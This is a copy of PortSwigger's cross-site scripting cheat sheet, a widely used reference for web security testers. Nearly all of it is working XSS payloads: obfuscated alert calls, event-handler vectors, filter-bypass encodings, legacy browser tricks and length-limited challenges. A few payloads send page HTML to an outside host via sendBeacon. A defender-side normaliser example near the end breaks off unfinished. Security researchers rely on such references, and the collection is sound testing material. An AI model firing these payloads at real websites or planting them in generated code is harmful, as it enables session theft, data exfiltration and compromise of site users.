XSS into a JavaScript string, octal escape sequence (globalThis) | globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window) | window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self) | self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this) | this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top) | top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent) | parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames) | frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis) | globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window) | window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self) | self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this) | this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top) | top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent) | parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames) | frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis) | globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window) | window[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self) | self[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this) | this[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top) | top[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent) | parent[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames) | frames[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis) | globalThis[(+{}+[])[+!![]]+(![]+[])[+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol | <img src="javascript:alert(1)">
Body background with JavaScript protocol | <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin | <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q/oncut=alert`` but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string; only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
VBScript protocol used to work in IE | <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE | <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript | <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript | <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator | <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator | <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup | <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup | <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2 | <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL also worked in Firefox 3.5 using data URLs | <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,3C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E)">
CSS expressions, IE <= 7 | <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">
In quirks mode IE allowed you to use = instead of : | <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE | <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions | <script> function window.onload() { alert(1) } </script> <script> function window::onload() { alert(1) } </script> <script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() {} </script> </body> <body> <script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>" } </script> </body>
GreyMagic HTML+time exploit (no longer works, even in IE5 docmode) | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & (NUL byte written as \x00) | <a href="javascript:&\x00#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities (NUL byte written as \x00) | <a href="javascript&col\x00on;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments (NUL byte written as \x00) | <!-- \x00> <img title="--><iframe/onload=alert(1)>"> --> <!-- \x00> <img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG | <svg><xss onload=alert(1)>
Isindex using src attribute | <isindex type=image src="//evil?
Isindex using submit | <isindex type=submit style="width:100%;height:100%;" value=XSS formaction="//evil?
Isindex and formaction | <isindex type=submit formaction=javascript:alert(1)>
Isindex and action | <isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.
onfocusout
Fires when an element loses focus
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
onhashchange
Fires if the hash changes
<body onhashchange=alert(1)>
onload
Fires when the element is loaded
<body onload=alert(1)>
onloadeddata
Fires when the first frame is loaded
<audio onloadeddata=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onloadedmetadata
Fires when the metadata is loaded
<audio autoplay onloadedmetadata=alert(1)> <source src=validaudio.wav type=audio/wav></audio>
onloadend
Fires when the element finishes loading
<image src=validimage.png onloadend=alert(1)>
onloadstart
Fires when the element begins to load
<image src=validimage.png onloadstart=alert(1)>
onmessage
Fires when a message event is received from a postMessage call
<body onmessage=alert(1)>
onpageshow
Fires when the page is shown
<body onpageshow=alert(1)>
onplay
Fires when the resource is played
<audio autoplay onplay=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onplaying
Fires when the resource is playing
<audio autoplay onplaying=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onpopstate
Fires when the history changes
<body onpopstate=alert(1)>
onprogress
Fires when the video/audio begins downloading
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
onreadystatechange
Fires when the ready state changes
<applet onreadystatechange=alert(1)></applet>
onrepeat
Fires when an SVG animation repeats
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onresize
Fires when the window is resized
<body onresize=alert(1)>
onscroll
Fires when the page scrolls
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onstart
Fires when the marquee starts
<marquee onstart=alert(1)>XSS</marquee>
ontimeupdate
Fires when the timeline is changed
<audio controls autoplay ontimeupdate=alert(1)><source src=validaudio.wav type=audio/wav></audio>
ontoggle
Fires when the details tag is expanded
<details ontoggle=alert(1) open>test</details>
ontransitioncancel
Fires when a CSS transition cancels
<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
ontransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
ontransitionrun
Fires when a CSS transition begins
<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
ontransitionstart
Fires when a CSS transition starts
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection
Fires when a promise rejection isn't handled
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload
Fires when the page is unloaded
<body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onwaiting
Fires while waiting for the data
<video autoplay controls onwaiting=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onwebkitanimationend
Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend=alert(1)></xss>
onwebkitanimationiteration
Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration=alert(1)></xss>
onwebkitanimationstart
Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart=alert(1)></xss>
onwebkittransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
Event handlers that do require user interaction
Event / Description / Code
onauxclick
Fires when right clicking or using the middle button of the mouse
<input onauxclick=alert(1)>
onbeforecopy
Requires you to copy a piece of text
<a onbeforecopy=alert(1) contenteditable>test</a>
onbeforecut
Requires you to cut a piece of text
<a onbeforecut=alert(1) contenteditable>test</a>
onbeforepaste
Requires you to paste a piece of text
<a onbeforepaste=alert(1) contenteditable>test</a>
onchange
Requires a change of value
<input onchange=alert(1) value=xss>
onclick
Requires a click on the element
<xss onclick=alert(1)>test</xss>
onclose
Fires when a dialog is closed
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu
Triggered when right clicking to show the context menu
<xss oncontextmenu=alert(1)>test</xss>
oncopy
Requires you to copy a piece of text
<xss oncopy=alert(1) value=XSS autofocus tabindex=1>test
oncut
Requires you to cut a piece of text
<xss oncut=alert(1) value=XSS autofocus tabindex=1>test
ondblclick
Triggered when double clicking the element
<xss ondblclick=alert(1) autofocus tabindex=1>test</xss>
ondrag
Triggered when dragging the element
<xss draggable=true ondrag=alert(1)>test</xss>
ondragend
Triggered when dragging of the element is finished
<xss draggable=true ondragend=alert(1)>test</xss>
ondragenter
Requires a mouse drag
<xss draggable=true ondragenter=alert(1)>test</xss>
ondragleave
Requires a mouse drag
<xss draggable=true ondragleave=alert(1)>test</xss>
ondragover
Triggered when dragging over an element
<div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart
Requires a mouse drag
<xss draggable=true ondragstart=alert(1)>test</xss>
ondrop
Triggered when dropping a draggable element
<div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange
Fires when a video changes full screen status
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
oninput
Requires a change of value
<input oninput=alert(1) value=xss>
oninvalid
Requires a form submission with an element that does not satisfy its constraints, such as a required attribute
<form><input oninvalid=alert(1) required><input type=submit>
onkeydown
Triggered when a key is pressed
<xss onkeydown=alert(1) contenteditable>test</xss>
onkeypress
Triggered when a key is pressed
<xss onkeypress=alert(1) contenteditable>test</xss>
onkeyup
Triggered when a key is released
<xss onkeyup=alert(1) contenteditable>test</xss>
onmousedown
Triggered when the mouse button is pressed
<xss onmousedown=alert(1)>test</xss>
onmouseenter
Triggered when the mouse is hovered over the element
<xss onmouseenter=alert(1)>test</xss>
onmouseleave
Triggered when the mouse is moved away from the element
<xss onmouseleave=alert(1)>test</xss>
onmousemove
Requires mouse movement
<xss onmousemove=alert(1)>test</xss>
onmouseout
Triggered when the mouse is moved away from the element
<xss onmouseout=alert(1)>test</xss>
onmouseover
Requires a hover over the element
<xss onmouseover=alert(1)>test</xss>
onmouseup
Triggered when the mouse button is released
<xss onmouseup=alert(1)>test</xss>
onmousewheel
Fires when the mouse wheel scrolls
<xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange
Fires when a video changes full screen status
<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is changed
<body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste
Requires you to paste a piece of text
<a onpaste=alert(1) contenteditable>test</a>
onpause
Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onpointerdown
Fires when the pointer is pressed down
<xss onpointerdown=alert(1)>XSS</xss>
onpointerenter
Fires when the pointer enters the element
<xss onpointerenter=alert(1)>XSS</xss>
onpointerleave
Fires when the pointer leaves the element
<xss onpointerleave=alert(1)>XSS</xss>
onpointermove
Fires when the pointer moves
<xss onpointermove=alert(1)>XSS</xss>
onpointerout
Fires when the pointer moves out of the element
<xss onpointerout=alert(1)>XSS</xss>
onpointerover
Fires when the pointer moves over the element
<xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate
Fires when the pointer changes
<xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup
Fires when the pointer is released
<xss onpointerup=alert(1)>XSS</xss>
onreset
Requires a click
<form onreset=alert(1)><input type=reset>
onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline
<audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onseeking
Requires clicking the element timeline
<audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onselect
Requires you to select text
<input onselect=alert(1) value=XSS autofocus>
onselectionchange
Fires when the text selection on the page is changed
<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection
<body onselectstart=alert(1)>select some text
onshow
Fires when the context menu is shown
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit
Requires a form submission
<form onsubmit=alert(1)><input type=submit>
ontouchend
Fires when a touch ends (touch-screen mobile devices only)
<body ontouchend=alert(1)>
ontouchmove
Fires when a touch moves across the screen (touch-screen mobile devices only)
<body ontouchmove=alert(1)>
ontouchstart
Fires when the screen is touched (touch-screen mobile devices only)
<body ontouchstart=alert(1)>
onvolumechange
Requires a volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onwheel
Fires when you use the mouse wheel
<body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling
<script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval, on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without a dot
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect
<script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings
<script>location=name</script>
No parentheses, using template strings
<script>alert`1`</script>
No parentheses, using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
Protocols
Iframe src attribute JavaScript protocol
<iframe src=javascript:alert(1)>
Object data attribute with JavaScript protocol
<object data=javascript:alert(1)>
Embed src attribute with JavaScript protocol
<embed src=javascript:alert(1)>
A standard JavaScript protocol
<a href=javascript:alert(1)>XSS</a>
The protocol is not case sensitive
<a href=JaVaScript:alert(1)>XSS</a>
Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol (a literal tab is used here)
<a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (a literal tab is used here)
<a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href=javascript:alert(1)><text x=20 y=20>XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src
<script src=data:text/javascript,alert(1)></script>
SVG script href attribute without closing script tag
<svg><script href=data:text/javascript,alert(1) />
SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah
Button and formaction
<form><button formaction=javascript:alert(1)>XSS
Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage
<a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy
<img referrerpolicy=no-referrer src=//portswigger-labs.net>
Set window.name via parameter on the window.open function
<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//','alert(1)')">XSS</a>
Set window.name via name attribute in an <iframe> tag
<iframe name="alert(1)" src="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></iframe>
Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag
<img src=validimage.png width=10 height=10 usemap=#xss><map name=xss><area shape=rect coords=0,0,82,126 target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></map>
Set window.name via target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type=submit value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag, type submit
<form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type=submit formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag, type image
<form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input name=1 type=image src=validimage.png formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain
<meta http-equiv=refresh content="0; url=//portswigger-labs.net">
Meta charset attribute UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referrer
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script>
%E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script>
%F8%80%80%80%BCscript>alert(1)</script>
%FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>
Octal encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon
<a href="&#106;avascript:alert(1)">XSS</a>
<a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9 (a literal tab follows the entity in the second and third vectors)
<a href="j&#x61vascript:alert(1)">XSS</a>
<a href="&#x6a	avascript:alert(1)">XSS</a>
<a href="&#x6a	avascript:alert(1)">XSS</a>
Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities
<a href="javascript&colon;alert(1)">XSS</a>
<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
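The parsing rules the Protocols and Encoding sections rely on (control characters before and inside the scheme, a case-insensitive scheme name, and decimal, hex and named character references with an optional semicolon) can be folded into one defender-side normaliser that decides whether an attribute value really is a javascript: URL. This is an added example written for this page, not code from the cheat sheet or from PortSwigger; the attribute-scanning regex, the small named-reference table and the sample markup are assumptions made for the example.

```javascript
// Added example, not part of the cheat sheet: normalise an href/src-style
// attribute value the way a browser does before classifying its scheme.

// Named references the page's vectors use; an assumption for this example,
// not the full HTML5 table.
const NAMED_REFS = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')',
  percnt: '%', sol: '/', semi: ';', quot: '"', lt: '<', gt: '>', amp: '&',
};

// Decode character references. Numeric ones accept an optional ';' and stop
// at the first non-digit, so "j&#x61vascript" and "&#0000106avascript" decode.
function decodeRefs(value) {
  return value.replace(
    /&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z][A-Za-z0-9]*));?/g,
    (match, hex, dec, name) => {
      if (name !== undefined) {
        return Object.prototype.hasOwnProperty.call(NAMED_REFS, name)
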